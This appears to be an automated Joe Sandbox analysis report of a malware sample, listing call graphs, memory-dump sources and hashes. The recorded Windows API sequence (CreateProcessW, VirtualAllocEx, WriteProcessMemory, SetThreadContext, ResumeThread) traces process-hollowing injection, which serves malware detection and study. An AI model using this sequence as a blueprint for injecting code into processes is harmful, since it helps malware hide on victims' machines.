                                                                                              execution_graph 2785 154870 2786 1548fd CreateProcessW 2785->2786 2788 154a56 2786->2788 2789 153c80 2790 153c9a 2789->2790 2791 153cea 2790->2791 2793 153d30 2790->2793 2794 153d73 2793->2794 2813 153a70 2794->2813 2817 153a6c 2794->2817 2795 154241 2821 153918 2795->2821 2825 153910 2795->2825 2796 154520 2807 153910 WriteProcessMemory 2796->2807 2808 153918 WriteProcessMemory 2796->2808 2797 154325 2797->2796 2805 153910 WriteProcessMemory 2797->2805 2806 153918 WriteProcessMemory 2797->2806 2798 15455e 2799 154646 2798->2799 2829 1537e9 2798->2829 2833 1537f0 2798->2833 2837 153b90 2799->2837 2841 153b88 2799->2841 2800 154703 2800->2790 2805->2797 2806->2797 2807->2798 2808->2798 2814 153ab4 VirtualAllocEx 2813->2814 2816 153b2c 2814->2816 2816->2795 2818 153a70 VirtualAllocEx 2817->2818 2820 153b2c 2818->2820 2820->2795 2822 153964 WriteProcessMemory 2821->2822 2824 1539fd 2822->2824 2824->2797 2826 153918 WriteProcessMemory 2825->2826 2828 1539fd 2826->2828 2828->2797 2830 1537f0 Wow64SetThreadContext 2829->2830 2832 1538b1 2830->2832 2832->2799 2834 153839 Wow64SetThreadContext 2833->2834 2836 1538b1 2834->2836 2836->2799 2838 153bd4 ResumeThread 2837->2838 2840 153c20 2838->2840 2840->2800 2842 153b90 ResumeThread 2841->2842 2844 153c20 2842->2844 2844->2800 2845 154ca0 ReadProcessMemory 2846 154d5f 2845->2846

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 194 154868-1548fb 196 154912-154920 194->196 197 1548fd-15490f 194->197 198 154937-154973 196->198 199 154922-154934 196->199 197->196 200 154975-154984 198->200 201 154987-154a54 CreateProcessW 198->201 199->198 200->201 205 154a56-154a5c 201->205 206 154a5d-154b1c 201->206 205->206 216 154b52-154b5d 206->216 217 154b1e-154b47 206->217 221 154b5e 216->221 217->216 221->221
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00154A41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: e030bc36cbf3a65ce91d52f87f96e908443cb248edce31ce26b6976d0e15e3af
                                                                                              • Instruction ID: 6add4b0379eec317d0c7a66f8f7260f20ce7a602720fdc1ba3ab7b744db344ac
                                                                                              • Opcode Fuzzy Hash: e030bc36cbf3a65ce91d52f87f96e908443cb248edce31ce26b6976d0e15e3af
                                                                                              • Instruction Fuzzy Hash: E081E174D00219CFDF25CFA5C844BDEBBB5BB09304F1491AAE519B7210DB709A89CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 222 154870-1548fb 223 154912-154920 222->223 224 1548fd-15490f 222->224 225 154937-154973 223->225 226 154922-154934 223->226 224->223 227 154975-154984 225->227 228 154987-154a54 CreateProcessW 225->228 226->225 227->228 232 154a56-154a5c 228->232 233 154a5d-154b1c 228->233 232->233 243 154b52-154b5d 233->243 244 154b1e-154b47 233->244 248 154b5e 243->248 244->243 248->248
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00154A41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 9bc00d7250c19185249a71cf51c8b34560cfc358541174e930aa9682a36f6035
                                                                                              • Instruction ID: d2065041ad47544a4c057f46886ec0ba5336145949e06eaae175ea5f19f681a0
                                                                                              • Opcode Fuzzy Hash: 9bc00d7250c19185249a71cf51c8b34560cfc358541174e930aa9682a36f6035
                                                                                              • Instruction Fuzzy Hash: DD81E174D00229CFDF25CFA5C884BDEBBB5BB09304F1491AAE519B7210DB709A89CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 249 153910-153983 252 153985-153997 249->252 253 15399a-1539fb WriteProcessMemory 249->253 252->253 255 153a04-153a56 253->255 256 1539fd-153a03 253->256 256->255
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001539EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: f9508b93f68515f1cda94fe2a66f6ff6c3cda8ecc2860f3331ed402fa434508e
                                                                                              • Instruction ID: 98d1dc777f9bbf8cb5598d7ea71a4732d15fa743f3fe174e858fc6fea57193ba
                                                                                              • Opcode Fuzzy Hash: f9508b93f68515f1cda94fe2a66f6ff6c3cda8ecc2860f3331ed402fa434508e
                                                                                              • Instruction Fuzzy Hash: 9641ACB4D01248DFCF00CFA9D984ADEFBF1BB49314F24942AE824BB210D375AA45CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 261 153918-153983 263 153985-153997 261->263 264 15399a-1539fb WriteProcessMemory 261->264 263->264 266 153a04-153a56 264->266 267 1539fd-153a03 264->267 267->266
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001539EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 603bcfa33d4450b1530b2f3aa8de6bc37de203cc972b8f43844307937e047329
                                                                                              • Instruction ID: cd63152d5b2a4b22275f20a2f935f10bfff0d780c47098e8f7a659daef258e57
                                                                                              • Opcode Fuzzy Hash: 603bcfa33d4450b1530b2f3aa8de6bc37de203cc972b8f43844307937e047329
                                                                                              • Instruction Fuzzy Hash: 86419BB5D01258DFCB00CFA9D984ADEFBF1BB49314F24942AE814BB210D375AA45CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 272 153a6c-153b2a VirtualAllocEx 276 153b33-153b7d 272->276 277 153b2c-153b32 272->277 277->276
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00153B1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 2aeea6a0e5254be10b8696fbf5e7486e7742f535e34c4f0882ea87bd30ee0db7
                                                                                              • Instruction ID: 1c95102203e49e43cd035a9ae3a80ce13579dee7ec8bb126778228286f0acf38
                                                                                              • Opcode Fuzzy Hash: 2aeea6a0e5254be10b8696fbf5e7486e7742f535e34c4f0882ea87bd30ee0db7
                                                                                              • Instruction Fuzzy Hash: 3731ABB4D00258DFCF10CFA9D984ADEFBB1BB49310F20942AE814BB210D735AA45CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 282 154c9c-154d5d ReadProcessMemory 284 154d66-154da4 282->284 285 154d5f-154d65 282->285 285->284
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00154D4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 787a83b51c4b4d03f44c50e9c05a129218412ef359e2bba3a128428edb703f57
                                                                                              • Instruction ID: 5887b93f35b8bea1835010a7e870af62dbbb6d18f4aa3ee0ee1a59da6e5b738f
                                                                                              • Opcode Fuzzy Hash: 787a83b51c4b4d03f44c50e9c05a129218412ef359e2bba3a128428edb703f57
                                                                                              • Instruction Fuzzy Hash: 193179B9D00258DFCF10CFAAD884ADEFBB1BB59314F20902AE814B7210D375AA45CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 288 153a70-153b2a VirtualAllocEx 291 153b33-153b7d 288->291 292 153b2c-153b32 288->292 292->291
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00153B1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: fecc867fb741f4abd0bf50b486cc1970161b0e0f4c193b8ae7c856f4efac6e30
                                                                                              • Instruction ID: 80afbd6a3030bd673045ea1d47e28f6fb9d0680d26c1920aa13d0904e4b038de
                                                                                              • Opcode Fuzzy Hash: fecc867fb741f4abd0bf50b486cc1970161b0e0f4c193b8ae7c856f4efac6e30
                                                                                              • Instruction Fuzzy Hash: F13189B8D00258DFCF10CFA9D984ADEFBB1BB49350F20942AE825BB210D735AA45CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 297 154ca0-154d5d ReadProcessMemory 298 154d66-154da4 297->298 299 154d5f-154d65 297->299 299->298
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00154D4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 0c00a9c75ed086afe62705d79e8c5f0e4f4b81aa4a80b0a3e28825d0eeac4d99
                                                                                              • Instruction ID: 3d924771e375c0164ed18dad8864e834aa417c40f5b737413cab8cc920b593e0
                                                                                              • Opcode Fuzzy Hash: 0c00a9c75ed086afe62705d79e8c5f0e4f4b81aa4a80b0a3e28825d0eeac4d99
                                                                                              • Instruction Fuzzy Hash: 1E318AB9D00258DFCF10CFAAD884ADEFBB1BB59310F10902AE814B7210D375AA45CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 302 1537e9-153850 305 153867-1538af Wow64SetThreadContext 302->305 306 153852-153864 302->306 308 1538b1-1538b7 305->308 309 1538b8-153904 305->309 306->305 308->309
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0015389F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: c7c15ac04dfc9044f1340fefc1bff0fa2c45e6843ef05200b0bc9bbd498971a0
                                                                                              • Instruction ID: dd59b0dd3e20bca5bacb59c904b9b6a7145ffd679d20cf4fcfe8f72fffa1648e
                                                                                              • Opcode Fuzzy Hash: c7c15ac04dfc9044f1340fefc1bff0fa2c45e6843ef05200b0bc9bbd498971a0
                                                                                              • Instruction Fuzzy Hash: 1C41B0B4D01258DFDB14CFA9D884AEEBBF1BB89354F24842AE814B7250C7786A49CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 314 1537f0-153850 316 153867-1538af Wow64SetThreadContext 314->316 317 153852-153864 314->317 319 1538b1-1538b7 316->319 320 1538b8-153904 316->320 317->316 319->320
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0015389F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: 95ea898f5a4fd9ead71337bd85540dcc56960d82086f43a11ab0166f61f87105
                                                                                              • Instruction ID: 8d7f78f166774abf29b6fab96de8012957e3d81ae251d95017e239c0c94bfde3
                                                                                              • Opcode Fuzzy Hash: 95ea898f5a4fd9ead71337bd85540dcc56960d82086f43a11ab0166f61f87105
                                                                                              • Instruction Fuzzy Hash: 6531BDB4D00258DFDB14CFA9D884AEEBBF1BB49354F24842AE814B7240C778AA49CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 00153C0E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: b3dd75e472c45d40843d57ad7ea3d6cd9a32f01f0dbafd1928b200169c99400a
                                                                                              • Instruction ID: 71254cbca40e6d56783362b890e398c4cb053fafb4b64f3699cf0bea90cf3083
                                                                                              • Opcode Fuzzy Hash: b3dd75e472c45d40843d57ad7ea3d6cd9a32f01f0dbafd1928b200169c99400a
                                                                                              • Instruction Fuzzy Hash: 7431BCB4D00219DFDF10CFA9D984ADEFBB4AB49350F20942AE824B7250D775A945CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 00153C0E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 743be6606df287034e10cc815a44d4e34f1bb4f45f713386cb49a93d6645ef0b
                                                                                              • Instruction ID: c67d6dc917431435122df5d2df9edf78e80788ca774db3bb6e81b44cf67869d2
                                                                                              • Opcode Fuzzy Hash: 743be6606df287034e10cc815a44d4e34f1bb4f45f713386cb49a93d6645ef0b
                                                                                              • Instruction Fuzzy Hash: 8F31CCB4D00218DFCB10CFA9D984AEEFBB4AF89350F20942AE824B7310C734AA45CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351370168.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_bd000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 23ae6f679befdde768aac3d75a85e9b169886b535f84219024b8aa8e141589a3
                                                                                              • Instruction ID: 40ef1b3d8c1d240dc357a3d3fccb97e20acdf531f4e81441ccb7f1bb4e122dd3
                                                                                              • Opcode Fuzzy Hash: 23ae6f679befdde768aac3d75a85e9b169886b535f84219024b8aa8e141589a3
                                                                                              • Instruction Fuzzy Hash: 81210371504240DFEB25DF10D8C4BAAFFA5FB94328F34C56AD8050B246D336D956CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351370168.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_bd000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c2a7613c0a56ce3c9cbe3d081ed45b9d684030b97154731165a9db01cb31c8c
                                                                                              • Instruction ID: 2af4d3ec581eb2a8c52ed98e223279d88d19e6a5529bada3780a4ab498db61b1
                                                                                              • Opcode Fuzzy Hash: 7c2a7613c0a56ce3c9cbe3d081ed45b9d684030b97154731165a9db01cb31c8c
                                                                                              • Instruction Fuzzy Hash: 2911B176504680CFDB15CF10D9C4B56FFB2FB94314F24C6AAD8094B256C33AD95ACBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.6%
                                                                                              Dynamic/Decrypted Code Coverage:2%
                                                                                              Signature Coverage:14.2%
                                                                                              Total number of Nodes:253
                                                                                              Total number of Limit Nodes:26

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,4q@,?,?,?,00000000), ref: 0040B44D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: SectionView
                                                                                              • String ID: 4q@$4q@
                                                                                              • API String ID: 1323581903-352822288
                                                                                              • Opcode ID: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                                                                              • Instruction ID: 4f0a1b00017ecff07558768542bc8224e4be8ae8b3833d489124d6a477246c7f
                                                                                              • Opcode Fuzzy Hash: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
                                                                                              • Instruction Fuzzy Hash: 16711C71E04158DFCB04CFA9C990AEDBBF5AF49304F18816AE859B7341D738AA45CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040B681
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                                                                              • Instruction ID: 33bbf8d930d8e7cfe3f019b155e8ea3f1efd11963211b11a84fa3dbb01a3117a
                                                                                              • Opcode Fuzzy Hash: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
                                                                                              • Instruction Fuzzy Hash: 1C813D71E041589FCB04CFA9C990AEDBBF5AF49304F18816AE459B7341D738A941CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B8A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                                                                              • Instruction ID: d5ca7a445566d5324237c67d8bda7c3d62ebcdba52f65f536e33ce5b52a41de4
                                                                                              • Opcode Fuzzy Hash: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
                                                                                              • Instruction Fuzzy Hash: 6B713BB1E14158DBCB04CFA9C890AEDBBF5BF49304F18816AE859B7351D338A945CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,004070F1,00000000,?,?,08000000), ref: 0040B221
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateSection
                                                                                              • String ID:
                                                                                              • API String ID: 2449625523-0
                                                                                              • Opcode ID: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                                                                              • Instruction ID: 01317c8874684397ccd25c89dd95e7ea8e4a3edbd884f59941ddaf063ff58e3a
                                                                                              • Opcode Fuzzy Hash: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
                                                                                              • Instruction Fuzzy Hash: CD712C71D14158DFCB05CFA9C890AEDBBB1BF49304F1881AAE859B7341D738A946CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 207 40bfd3-40c037 call 40a113 call 40a123 212 40c115-40c13a NtAllocateVirtualMemory 207->212 213 40c03d-40c082 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 207->213 214 40c140-40c147 212->214 215 40c1d7-40c1e3 212->215 235 40c08d-40c093 213->235 217 40c152-40c158 214->217 219 40c180-40c184 217->219 220 40c15a-40c17e 217->220 224 40c1c6-40c1d4 call 40a1b3 219->224 225 40c186-40c18d 219->225 220->217 224->215 226 40c198-40c19e 225->226 226->224 230 40c1a0-40c1c4 226->230 230->226 236 40c095-40c0b9 235->236 237 40c0bb-40c0bf 235->237 236->235 237->212 238 40c0c1-40c0dc 237->238 240 40c0e7-40c0ed 238->240 240->212 241 40c0ef-40c113 240->241 241->240
                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040C12D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                                                                              • Instruction ID: 8143565c1ed0993058e6d586fa4036d4e587653beb669d54d7f95b9336940cd5
                                                                                              • Opcode Fuzzy Hash: af22745c9356b21275a4ed7ec95143a4cc00c792e14a36387ff7ba92eb16b96b
                                                                                              • Instruction Fuzzy Hash: 62712F71E04158DFCB04CFA9C890AEDBBF1BF49304F18816AE859BB341D638A946CF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 279 40aa93-40aaf7 call 40a113 call 40a123 284 40abd5-40abea NtSetContextThread 279->284 285 40aafd-40ab42 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 279->285 287 40abf0-40abf7 284->287 288 40ac87-40ac93 284->288 307 40ab4d-40ab53 285->307 290 40ac02-40ac08 287->290 292 40ac30-40ac34 290->292 293 40ac0a-40ac2e 290->293 296 40ac76-40ac84 call 40a1b3 292->296 297 40ac36-40ac3d 292->297 293->290 296->288 300 40ac48-40ac4e 297->300 300->296 301 40ac50-40ac74 300->301 301->300 308 40ab55-40ab79 307->308 309 40ab7b-40ab7f 307->309 308->307 309->284 311 40ab81-40ab9c 309->311 312 40aba7-40abad 311->312 312->284 313 40abaf-40abd3 312->313 313->312
                                                                                              APIs
                                                                                              • NtSetContextThread.NTDLL(?,?), ref: 0040ABDD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ContextThread
                                                                                              • String ID:
                                                                                              • API String ID: 1591575202-0
                                                                                              • Opcode ID: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                                                                              • Instruction ID: d4e5869915a99125bcdad7944eea00a2bf72dfbca1512e106d76b181c7b9fddb
                                                                                              • Opcode Fuzzy Hash: 7d3590489634a5643a165557ae1e62707ac94800af8139a2bf38665b0a25d032
                                                                                              • Instruction Fuzzy Hash: DC718F71E04258DFCB04CFA9C490AEDBBF2BF49304F18806AE419BB341D638A956DF55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 351 40bbb3-40bbd2 352 40bbd8-40bc17 call 40a123 351->352 353 40bbd3 call 40a113 351->353 356 40bcf5-40bd0b NtDelayExecution 352->356 357 40bc1d-40bc62 call 40a1b3 call 42f3b2 call 40a083 call 42f3b2 352->357 353->352 358 40bd11-40bd18 356->358 359 40bda8-40bdb4 356->359 379 40bc6d-40bc73 357->379 361 40bd23-40bd29 358->361 363 40bd51-40bd55 361->363 364 40bd2b-40bd4f 361->364 366 40bd97-40bda5 call 40a1b3 363->366 367 40bd57-40bd5e 363->367 364->361 366->359 370 40bd69-40bd6f 367->370 370->366 373 40bd71-40bd95 370->373 373->370 380 40bc75-40bc99 379->380 381 40bc9b-40bc9f 379->381 380->379 381->356 383 40bca1-40bcbc 381->383 384 40bcc7-40bccd 383->384 384->356 385 40bccf-40bcf3 384->385 385->384
                                                                                              APIs
                                                                                              • NtDelayExecution.NTDLL(0041C291,?,?,?,00000000), ref: 0040BCFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_400000_op55336.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DelayExecution
                                                                                              • String ID:
                                                                                              • API String ID: 1249177460-0
                                                                                              • Opcode ID: 10f784cb7a7465b49218334df4e70ac1398cacb19b884e6fb5fd4ed04110ac16
                                                                                              • Instruction ID: 224df048350992204dea636a9cf2136097186a6e34023e583b2a4fcadb8b91eb
